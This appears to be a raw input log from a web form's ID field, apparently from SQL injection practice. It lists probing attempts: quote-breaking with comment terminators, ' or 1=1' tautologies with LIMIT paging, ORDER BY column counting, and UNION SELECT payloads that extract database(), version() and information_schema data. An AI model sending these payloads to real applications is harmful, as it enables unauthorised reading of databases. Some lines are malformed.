ID:1
ID:1
ID:1]
ID:1]
ID:1]
ID:1\
ID:1'
ID:1'
ID:1\
ID:1' -- 
ID:1' 
ID:1'  
ID:1'  --
ID:1'  --
ID:1'  -- 
ID:1' union select 1,database(),3 -- 
ID:0' union select 1,database(),3 -- 
ID:0' union select 1,database(),3 
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1‘ union select 1,2,3 #
ID:1‘ union select 1,2,3 #
ID:-1‘ union select 1,2,3 #
ID:-1‘ union select 1,2,3 #
ID:-1‘ union select 1,2,3 -- 
ID:-1‘ union select 1,2,3 -- 
ID:-1‘ union select 1,2,3 -- 
ID:-1‘ union select 1,2,3 -- 
ID:-1‘ union select 1,2,3 -- 
ID:-1‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3  -- 
ID:0‘ union select 1,2,3
ID:0’ union select 1,2,3
ID:1
ID:1'
ID:1' union  select 1,2,3 -- 
ID:-1' union  select 1,2,3 -- 
ID:-1' union  select 1,2,3 #
ID:-1' union  select 1,2,3 #
ID:-1' union  select 1,2,3 #
ID:-1' union  select 1,2,3 
ID:-1' union  select 1,2,3 #
ID:1
ID:1\
ID:1' union  select 1,2,3 -- 
ID:1' union  select 1,2,3 #
ID:-1' union  select 1,2,3 #
ID:1'
ID:1 -- 
ID:1 union select 1,2,3 -- 
ID:-1 union select 1,2,3 -- 
ID:-1' union select 1,2,3 -- 
ID:1\
ID:1
ID:1
ID:1
ID:1
ID:1' -- 
ID:1' or 1==1 -- 
ID:1' or 1=1 -- 
ID:100' -- 
ID:100' or 1=1 -- 
ID:1' and database() regexp '[a-z]' -- 
ID:1' and database() regexp '[a-z]' -- 
ID:1' --
ID:1\
ID:1' -- 
ID:1' --
ID:1' -- 
ID:1'; -- 
ID:1' union select 1,2,3 ; -- 
ID:0' union select 1,2,3 ; -- 
ID:1
ID:1' or 1=1
ID:1' or 1=1 -- 
ID:0' or 1=1 -- 
ID:0' or 1=1 limit 0,1-- 
ID:0' or 1=1 limit 0,2-- 
ID:0' or 1=1 limit 1,1-- 
ID:
ID:1
ID:2
ID:2'
ID:2\ or 1=1 -- 
ID:2' or 1=1 -- 
ID:0' or 1=1 -- 
ID:0' or 1=1 limit 0,1-- 
ID:0' or 1=1 limit 1,1-- 
ID:0' or 1=1 limit 2,1-- 
ID:0' or 1=1 limit 3,1-- 
ID:0' or 1=1 limit 4,1-- 
ID:0' or 1=1 limit 5,1-- 
ID:0' or 1=1 limit 5,1 -- 
ID:' or '1'='1
ID:' or '1'='1' limit 0,1 
ID:' or '1'='1' limit 0,1 -- 
ID:' or 1=1 limit 0,1 -- 
ID:' and 1=1 limit 0,1 -- 
ID:1' and 1=1 limit 0,1 -- 
ID:1' and 1=1 limit 1,1 -- 
ID:1' and 1=1 limit 0,1 -- 
ID:2
ID:1
ID:2
ID:4
ID:8
ID:100
ID:2
ID: 1'
ID:database()
ID:1
ID:1'
ID:1' or 1=1
ID:1' or 1='1
ID:1' or 1=1--
ID:1' or 1=1
ID:1' or 1=1--
ID:1 or 1=1--
ID:1' or '1=1--
ID:1' or 1=1--
ID:2
ID:1
ID:4
ID:4'
ID:4 order by 5 -- 
ID:4 order by 20 -- 
ID:4 order by 300 -- 
ID:4' order by 300 -- 
ID:4' order by 10 -- 
ID:4' order by 2 -- 
ID:4' order by 4 -- 
ID:4' order by 3 -- 
ID:4' UnIon Select 1,2,3 -- 
ID:-4' UnIon Select 1,2,3 -- 
ID:-4' UnIon Select 1,database(),3 -- 
ID:-4' UnIon Select 1,database(),version() -- 
ID:-4' UnIon Select 1,select * from information_schema.tables,3 -- 
ID:1
ID:2
ID:' or 1=1
ID:'or'1'='1'
ID:9
ID:1\
